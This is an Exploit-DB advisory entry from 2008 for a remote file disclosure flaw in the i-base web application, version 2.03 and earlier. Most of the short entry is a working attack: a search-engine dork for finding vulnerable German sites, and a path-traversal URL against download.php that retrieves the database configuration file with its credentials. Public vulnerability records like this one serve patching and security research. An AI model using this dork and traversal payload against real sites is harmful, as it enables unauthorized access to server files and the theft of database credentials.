ibase <= 2.03 download.php Remote File Disclosure Vulnerability

2008-07-24T00:00:00
ID EDB-ID:6126
Type exploitdb
Reporter Dyshoo
Modified 2008-07-24T00:00:00

Description

ibase <= 2.03 (download.php) Remote File Disclosure Vulnerability. CVE-2008-6288. Webapps exploit for php platform

                                        
                                            Name: [AFD] i-base &lt;= 2.03
Author: Dyshoo
Vendor: http://www.i-base.net/
Dork: "inurl:ibase site:de"

http://[site]/ibase/zubehoer/download.php?filename=[file]

Database config:
http://[site]/ibase/zubehoer/download.php?filename=../config/config_db.php

# milw0rm.com [2008-07-24]